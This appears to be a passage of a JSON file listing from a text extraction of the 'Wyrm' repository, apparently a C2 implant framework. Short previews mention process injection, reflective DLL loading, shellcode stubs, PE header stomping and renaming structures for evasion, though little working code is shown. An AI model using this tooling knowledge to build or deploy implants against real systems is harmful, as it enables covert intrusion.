  {
    "path": "implant/src/spawn_inject/early_cascade.rs",
    "chars": 8776,
    "preview": "use std::{ffi::c_void, ptr::null_mut};\n\nuse shared::tasks::WyrmResult;\nuse shared_no_std::{\n    export_resolver::{Export"
  },
  {
    "path": "implant/src/spawn_inject/injection.rs",
    "chars": 4079,
    "preview": "use std::{ffi::c_void, mem::transmute, ptr::null_mut};\n\nuse shared::tasks::WyrmResult;\nuse shared_no_std::export_resolve"
  },
  {
    "path": "implant/src/spawn_inject/mod.rs",
    "chars": 841,
    "preview": "//! A module for loading / injecting Wyrm into other / new processes.\n\nuse shared::tasks::WyrmResult;\n\nuse crate::spawn_"
  },
  {
    "path": "implant/src/stubs/mod.rs",
    "chars": 107,
    "preview": "//! A module containing publicly exported stubs that are 'context independent'\n\npub mod rdi;\npub mod shim;\n"
  },
  {
    "path": "implant/src/stubs/rdi.rs",
    "chars": 21319,
    "preview": "//! Reflective DLL injector for Wyrm.\n//!\n//! This assumes that the DLL is loaded into memory by a wrapper around us whi"
  },
  {
    "path": "implant/src/stubs/shim.rs",
    "chars": 2351,
    "preview": "//! This is a shellcode (no_std rust near enough == shellcode just not hand coded) stub in the rDLL for Early Cascade\n//"
  },
  {
    "path": "implant/src/utils/allocate.rs",
    "chars": 843,
    "preview": "use std::alloc::{GlobalAlloc, Layout};\nuse windows_sys::Win32::System::Memory::{\n    GetProcessHeap, HEAP_ZERO_MEMORY, H"
  },
  {
    "path": "implant/src/utils/comptime.rs",
    "chars": 3589,
    "preview": "use std::process::exit;\n\nuse str_crypter::{decrypt_string, sc};\n\nuse crate::utils::console::print_failed;\n\npub type Slee"
  },
  {
    "path": "implant/src/utils/console.rs",
    "chars": 4238,
    "preview": "use std::{\n    ffi::c_void,\n    fmt::Display,\n    ptr::null_mut,\n    sync::{\n        Mutex, Once, OnceLock,\n        atom"
  },
  {
    "path": "implant/src/utils/export_comptime.rs",
    "chars": 3674,
    "preview": "//! A module for creating either fake exports full of junk, or exports which\n//! lead to the running of the agent, custo"
  },
  {
    "path": "implant/src/utils/mod.rs",
    "chars": 170,
    "preview": "pub mod allocate;\npub mod comptime;\npub mod console;\npub mod export_comptime;\npub mod pe_stomp;\npub mod proxy;\npub mod s"
  },
  {
    "path": "implant/src/utils/pe_stomp.rs",
    "chars": 561,
    "preview": "/// Given an input mutable buffer, stomps the first 50 bytes at hte `MZ` point, and\n/// the \"This program cannot be run "
  },
  {
    "path": "implant/src/utils/proxy.rs",
    "chars": 10029,
    "preview": "use std::{ffi::c_void, iter::once, mem::zeroed, ptr::null_mut};\n\nuse windows_sys::Win32::{\n    Foundation::{GlobalFree, "
  },
  {
    "path": "implant/src/utils/strings.rs",
    "chars": 1794,
    "preview": "use std::slice::from_raw_parts;\n\nuse windows_sys::Win32::Foundation::MAX_PATH;\n\n/// Converts a WSTR to a String by the *"
  },
  {
    "path": "implant/src/utils/svc_controls.rs",
    "chars": 1599,
    "preview": "use std::{\n    ffi::c_void,\n    ptr::null_mut,\n    sync::atomic::{AtomicBool, AtomicPtr, Ordering},\n};\n\nuse windows_sys:"
  },
  {
    "path": "implant/src/utils/time_utils.rs",
    "chars": 273,
    "preview": "use windows_sys::Win32::System::SystemInformation::GetSystemTimeAsFileTime;\n\npub fn epoch_now() -> i64 {\n    unsafe {\n  "
  },
  {
    "path": "implant/src/wofs/mod.rs",
    "chars": 1348,
    "preview": "use std::{mem::transmute, ptr::null};\n\nuse shared::tasks::WyrmResult;\nuse str_crypter::{decrypt_string, sc};\n\ninclude!(c"
  },
  {
    "path": "implant/src/wyrm.rs",
    "chars": 27786,
    "preview": "//! Wyrm represents the state and structure of the implant itself, including any functions\n//! on the implant.\n\nuse std:"
  },
  {
    "path": "loader/.cargo/config.toml",
    "chars": 230,
    "preview": "[target.x86_64-pc-windows-msvc]\nrustflags = [\n    \"-Z\", \"location-detail=none\",\n    \"-C\", \"panic=abort\",\n    \"-C\", \"targ"
  },
  {
    "path": "loader/Cargo.toml",
    "chars": 886,
    "preview": "[package]\nname = \"loader\"\nversion = \"0.1.0\"\nedition = \"2024\"\nbuild = \"build.rs\"\n\n[profile.release]\nopt-level = \"z\"\nlto ="
  },
  {
    "path": "loader/build.rs",
    "chars": 3797,
    "preview": "use std::{\n    env,\n    fmt::Write,\n    fs::{self, File},\n    io::Read,\n    path::{Path, PathBuf},\n};\n\nconst ENCRYPTION_"
  },
  {
    "path": "loader/src/export_comptime.rs",
    "chars": 3550,
    "preview": "//! A module for creating either fake exports full of junk, or exports which\n//! lead to the running of the agent, custo"
  },
  {
    "path": "loader/src/injector.rs",
    "chars": 4833,
    "preview": "use core::{\n    ffi::{CStr, c_void},\n    mem::transmute,\n    ptr::{copy_nonoverlapping, null_mut, read_unaligned},\n};\n\nu"
  },
  {
    "path": "loader/src/lib.rs",
    "chars": 611,
    "preview": "#![no_std]\n#![no_main]\n\nuse windows_sys::Win32::{Foundation::HINSTANCE, System::SystemServices::DLL_PROCESS_ATTACH};\n\nus"
  },
  {
    "path": "loader/src/main.rs",
    "chars": 307,
    "preview": "#![no_std]\n#![no_main]\n\nuse crate::injector::inject_current_process;\n\nmod injector;\nmod utils;\n\n#[cfg_attr(not(test), pa"
  },
  {
    "path": "loader/src/main_svc.rs",
    "chars": 2843,
    "preview": "#![no_std]\n#![no_main]\n#![cfg_attr(not(test), windows_subsystem = \"windows\")]\n#![no_main]\n\nuse crate::injector::inject_c"
  },
  {
    "path": "loader/src/utils.rs",
    "chars": 1419,
    "preview": "use windows_sys::Win32::Foundation::MAX_PATH;\n\n/// Generates a safe system `Global` mutex name given an input string.\n//"
  },
  {
    "path": "nginx/nginx.conf",
    "chars": 1913,
    "preview": "worker_processes  1;\n\nevents {\n    worker_connections 1024;\n}\n\nhttp {\n  server {\n    listen 80;\n    server_name localhos"
  },
  {
    "path": "resources/.$wyrm_staging.drawio.bkp",
    "chars": 7039,
    "preview": "<mxfile host=\"Electron\" agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) draw.io/"
  },
  {
    "path": "resources/wyrm.excalidraw",
    "chars": 49991,
    "preview": "{\n  \"type\": \"excalidraw\",\n  \"version\": 2,\n  \"source\": \"https://excalidraw.com\",\n  \"elements\": [\n    {\n      \"id\": \"Sz3dK"
  },
  {
    "path": "shared/Cargo.toml",
    "chars": 320,
    "preview": "[package]\nname = \"shared\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nserde = {version = \"1.0\", features = [\"deri"
  },
  {
    "path": "shared/readme.md",
    "chars": 331,
    "preview": "# Shared\n\nThis crate holds shared types, implementations, and logic which are shared across multiple crates,\nbut importa"
  },
  {
    "path": "shared/src/lib.rs",
    "chars": 396,
    "preview": "use serde::{Deserialize, Serialize};\n\npub mod net;\npub mod stomped_structs;\npub mod task_types;\npub mod tasks;\n\n#[derive"
  },
  {
    "path": "shared/src/net.rs",
    "chars": 3425,
    "preview": "use serde::{Deserialize, Serialize};\n\nuse crate::tasks::{Command, Task};\n\nconst NET_XOR_KEY: u8 = 0x3d;\npub const STR_CR"
  },
  {
    "path": "shared/src/stomped_structs.rs",
    "chars": 2496,
    "preview": "//! This module provides structs which have had their serilisation names stomped for evasion purposes, primarily\n//! the"
  },
  {
    "path": "shared/src/task_types.rs",
    "chars": 1049,
    "preview": "use serde::{Deserialize, Serialize};\n\n/// The inner type for the [`AdminCommand::Copy`] and [`AdminCommand::Move`], repr"
  },
  {
    "path": "shared/src/tasks.rs",
    "chars": 18140,
    "preview": "use core::panic;\nuse serde::{Deserialize, Serialize};\nuse std::{\n    collections::{BTreeMap, HashSet},\n    fmt::{Debug, "
  },
  {
    "path": "shared_c2_client/Cargo.toml",
    "chars": 362,
    "preview": "[package]\nname = \"shared_c2_client\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nserde = {version = \"1.0\", feature"
  },
  {
    "path": "shared_c2_client/readme.md",
    "chars": 235,
    "preview": "# shared_c2_client\n\nThis is a shared library for use between the C2 and the Client which requires certain\nfeatures which"
  },
  {
    "path": "shared_c2_client/src/lib.rs",
    "chars": 9306,
    "preview": "use serde::{Deserialize, Serialize};\nuse serde_json::Value;\nuse shared::tasks::{Command, Task};\nuse sqlx::FromRow;\n\npub "
  },
  {
    "path": "shared_no_std/Cargo.toml",
    "chars": 363,
    "preview": "[package]\nname = \"shared_no_std\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nwindows-sys = {version = \"0.61\", fea"
  },
  {
    "path": "shared_no_std/src/export_resolver.rs",
    "chars": 14110,
    "preview": "//! Export resolver is a local copy of my https://github.com/0xflux/PE-Export-Resolver crate.\n//! Currently the module c"
  },
  {
    "path": "shared_no_std/src/lib.rs",
    "chars": 53,
    "preview": "#![no_std]\n\npub mod export_resolver;\npub mod memory;\n"
  },
  {
    "path": "shared_no_std/src/memory.rs",
    "chars": 5394,
    "preview": "use core::{ffi::c_void, ptr::read_unaligned, slice::from_raw_parts};\n\nuse crate::export_resolver;\n\n/// Byte pattern foun"
  },
  {
    "path": "wofs_static/Readme.md",
    "chars": 8426,
    "preview": "# Static WOFs\n\nWOFs (Wyrm Object Files) are small, self-contained code modules that are baked into the implant at compil"
  }
]

About this extraction

This page contains the full source code of the 0xflux/Wyrm GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 171 files (693.8 KB), approximately 178.5k tokens, and a symbol index with 627 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — a free GitHub repository-to-text converter for AI. Built by Nikandr Surkov.

Copied to clipboard!